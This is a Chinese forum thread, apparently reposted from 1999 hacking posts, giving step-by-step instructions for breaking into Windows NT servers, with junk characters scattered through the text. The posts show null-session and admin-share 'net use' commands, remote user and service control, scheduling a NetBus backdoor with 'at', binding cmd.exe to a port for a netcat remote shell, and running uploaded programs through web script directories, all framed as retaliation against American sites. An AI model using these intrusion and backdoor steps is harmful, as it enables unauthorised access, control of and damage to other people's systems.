找回密码
 注册

QQ登录

只需一步,快速开始

关于“怎样进入NT主机”的几点补充

[复制链接]
发表于 2011-1-13 17:03:28 | 显示全部楼层 |阅读模式
《版主页黑客工具和文章的几个问题》中提到:
( l8 l7 x7 J! \# M! O请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。2 Q+ M3 _% K6 D$ l9 }
> 我的机子MMX166,WIN98,2。5G,32M内存。' U, i6 B: F7 X1 F' K  ?
; w, d% k& M8 X9 _, k, V0 ^$ S9 i
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。0 Q% c' m0 u# q% V/ e
你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。. U% V% m) y% \0 x
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
( p( l  @6 B$ j0 vnet use \\111.111.111.111\ipc$ "" /user:""
- d0 v6 ~  N4 w. D4 i6 gnet.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
4 F) U) K5 r( P% ?! unet view \\111.111.111.111$ t" f: k# A. Z7 c: i& `
当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:' V  Z6 s# f- ]+ J1 Q+ X
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
; t$ k, U  E8 @1 s5 b命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
; p% d7 r1 F2 u! j" l+ a! i, z5 J% E1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:: y- e1 N$ f$ B- |. w! _( q) f
net use x: \\111.111.111.111\c$  F, }5 W& }( h
net use y: \\111.111.111.111\d$" q" j: @% d, z( {" g! j
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...6 ?* q2 x  m1 m9 V7 [- N
2、管理目标NT的用户:' a9 Y1 s  l/ s0 P: Y
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”( L8 e6 C. @. |( K; D8 z
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样0 q8 {# h0 Z/ B" U# l
3、管理目标NT的服务9 j. b( i' U+ a% O( v( b! y
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”, z, \1 G! u. e4 r8 c
这样你可以管理目标NT上的服务,共享目录
& y4 _/ n8 ^: Z& b+ V& w' _4、IIS管理
6 [; I2 k5 P+ x( T- w选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
/ t5 g2 Q- U3 H9 c目标NT的FTP、WWW服务你就可以重新配置7 F4 A9 W' r  Z
5、事件管理3 [/ z+ e! q: q# c  p# |7 c/ v) K
“事件查看器”->连接到服务器->111.111.111.111
) C3 D1 n& O- G( i9 r  M! }$ f4 q1 d5 ]
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。. ]- l  e9 s, a
+ d6 B. S! w9 Y( f( U, X
当然,98,95也能做一些事情,但很麻烦,比如:
6 L3 c3 ?5 p' z6 d: Qnet use \\111.111.111.111\ipc$0 r  J+ N. x$ `$ Q# W
net use z: \\111.111.111.111\d$0 R  r. A+ r* K$ m% R# H( g
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等6 D. ]/ t, \+ p2 b# M8 Q

3 P5 q1 R0 p2 q% f8 V我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!* p; t5 x: e& x9 N% ]1 _! C6 i, J
这样,你还可以了解目标机器上能有什么东东供你去用!0 }( }/ D# D0 u$ T$ h8 y

9 @$ s& R* m  _; P' R4 B! d; I" J6 R8 T% Y! d5 }( W4 L% l- |
--------------------------------------------------------------------------------" q$ ~$ m3 t, q
+ A9 Y/ H4 J) |. [* X
>quack于1999-06-12,23:37:44
0 q" }4 L+ @) Q4 m在大作《几个有关黑的问题》中提到:
- ~# o3 d# F5 [% ?7 {首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
! t" x! W1 g0 J3 p8 ]1 v/ W% R4 N* R% w
killusa于1999-06-13,03:25:15
8 Z( J' M% F! @3 A8 u在大作《Re: 几个有关黑的问题》中提到:
0 `: m1 D1 y) Y8 U" o9 y# u( h" \" |1 S8 F- M
letmein.exe 暂时没有mypwd参数,十分抱歉
3 C8 Q9 c( v9 d. X0 Epinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。
, c$ P8 \3 s% F. m% D& q; P8 w8 P9 `& \/ e
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
$ V* n; ?) P( k- d4 e服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:1 `& z3 ~9 y( P- m

% ~( |/ R' w( O# q1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
0 z6 c; ~9 \2 _) L- `, s3 j" t, E3 d( o' [0 _! x: j. h
C:\>net start schedule
9 X# Y  Z1 i! S2 x( wSchedule 正在启动服务.....
- r; a: T& Z1 |& ^5 g! N5 SSchedulw 服务启动成功。
. o$ B" M0 p' D2 XC:\>at /?1 m& H! Z6 |4 ^* n
AT 命令排定在特定的日期和时间运行某些命令和程序。
7 N0 y4 Q7 U* F" ]3 a# V' X运行 AT 命令之前必须先启动 Schedule 服务。2 a1 b! `  A% i8 n# {) Z8 |1 {3 P

& ^/ I. S& |3 v  q; yAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
2 x( g7 S" z: t, C( r) p5 d: XAT [\\computername] time [/INTERACTIVE]5 }6 K  K# P( p# E3 B
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
% |# E$ x" c6 d. y( E+ F* p- Q  |7 h) j& ?' j  n# Q
\\computername 指定远程计算机。 如果省略这个参数
/ I" P7 \) a: @5 h7 z命令会被排定在本机上运行。( L8 @1 B8 T3 T
id 指定给排定进度命令的识别号。
3 o3 J7 e$ b% H. b, m, P( Q1 K- S, t" l$ M! F* H/ q4 N6 F6 ^
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。$ R8 N- s* ~8 x, ~: \
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。1 _4 p; y4 H; E3 \" I
time 指定命令运行的时间。, L! I& A7 k! E/ u) L6 H
/interactive 允许作业在运行时,与用户通过桌面交互。
( H: O. e$ w( y! ~' V
; }4 v8 S( e9 h" ~1 k% j/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。: L  o7 h6 @' `
如果省略日期,则默认为在每月的本日运行。
/ [3 M: w  I* e" U- [/ U8 t3 w! p6 ?1 T9 f* w
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
5 A2 ^# D1 c# U, k* s5 S( c+ \' n9 f- P% T% S9 r$ I
"command" 准备运行的 Windows NT 命令或批处理文件。! `7 d5 [6 V4 Z: W) U- N, R* i6 c. Z" C
% `& b/ R) _7 X# w2 E+ n' c
C:\>
$ y# p8 _4 x0 o& b, Z6 {& Z- H
7 j6 Z, U* Z7 W: ~7 r知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:+ J! ~( `5 G1 O8 Q6 V2 X
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"' \* c, z5 {1 `: g% [! ]
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
0 N$ g' y. l! y% u+ Z- K3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
, v# X1 M5 ?" L% ~$ ~at \\x.x.x.x 00:00 ntsrv.exe /port:64321' M/ j7 z& N6 C+ g  d, s3 x. Q
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:
/ Q% b. k  ]. ^  uMicrosoft(R) Windows NT(TM)' t3 F+ P! j- y. {0 D  `
(C) Copyright 1985-1996 Microsoft Corp.7 S; [1 j: J5 F0 m" |; h& r
C:\>
) M( c8 C% e' n0 l0 ~3 S7 e6 Q
4 @! B& K9 g2 f/ G* X1 M4 |6 s2、利用web启动ntsrv.exe或其他程序在目的服务器. u, O+ K8 U5 {" ?, P" t" }
, p; \, A) u! ~; ]- D6 A
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
" W- h8 a; R. C' M1 vhttp://x.x.x.x/scripts/ntsrv.exe /port:643214 s& z" A" U" V& K6 a
http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
1 e- o4 z1 R. B, l2 z' ^+ G# a) Q该程序就启动了8 }0 I. @6 i1 c

9 M# i  k' h9 h( J; g# L" V我只提这几中方法!
: L4 @% o0 v) o1 \* H, |$ [* U要成功,必须打好基础工,对操作系统充分了解!. y+ o* o. j3 z/ f2 B/ ?- k. N
6 G4 A. B  B  a
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-7-30 01:37

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表